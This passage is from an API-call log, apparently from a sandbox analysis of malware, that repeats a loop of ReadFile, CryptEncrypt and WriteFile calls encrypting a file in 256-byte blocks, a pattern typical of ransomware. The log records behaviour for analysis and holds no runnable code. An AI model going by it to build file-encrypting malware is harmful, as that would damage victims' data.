lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.085] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.085] GetLastError () returned 0x0 [0163.085] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.085] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.085] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.085] GetLastError () returned 0x0 [0163.085] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.085] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.085] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.085] GetLastError () returned 0x0 [0163.085] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.085] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.085] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.085] GetLastError () returned 0x0 [0163.085] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.085] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.085] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.085] GetLastError () returned 0x0 [0163.085] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.086] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.086] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.086] GetLastError () returned 0x0 [0163.086] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.086] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.086] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.086] GetLastError () returned 0x0 [0163.086] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.086] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.086] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.086] GetLastError () returned 0x0 [0163.086] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.086] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.086] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.086] GetLastError () returned 0x0 [0163.086] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.086] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.086] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.086] GetLastError () returned 0x0 [0163.086] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.086] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.086] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.086] GetLastError () returned 0x0 [0163.086] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.087] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.087] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.087] GetLastError () returned 0x0 [0163.087] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.087] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.087] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.087] GetLastError () returned 0x0 [0163.087] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.087] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.087] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.087] GetLastError () returned 0x0 [0163.087] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.087] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.087] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.087] GetLastError () returned 0x0 [0163.087] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.087] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.087] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.087] GetLastError () returned 0x0 [0163.087] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.087] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.087] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.087] GetLastError () returned 0x0 [0163.087] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.087] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.088] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.088] GetLastError () returned 0x0 [0163.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.088] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.088] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.088] GetLastError () returned 0x0 [0163.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.088] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.088] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.088] GetLastError () returned 0x0 [0163.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.088] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.088] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.088] GetLastError () returned 0x0 [0163.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.088] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.088] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.088] GetLastError () returned 0x0 [0163.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.088] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.088] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.088] GetLastError () returned 0x0 [0163.088] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.088] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.088] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.088] GetLastError () returned 0x0 [0163.089] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.089] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.089] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.089] GetLastError () returned 0x0 [0163.089] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.089] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.089] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.089] GetLastError () returned 0x0 [0163.089] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.089] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.089] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.089] GetLastError () returned 0x0 [0163.089] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.089] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.089] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.089] GetLastError () returned 0x0 [0163.089] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.089] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.089] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.089] GetLastError () returned 0x0 [0163.089] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.089] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.089] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.089] GetLastError () returned 0x0 [0163.089] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.090] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.090] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.090] GetLastError () returned 0x0 [0163.090] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.090] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.090] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.090] GetLastError () returned 0x0 [0163.090] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.090] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.090] 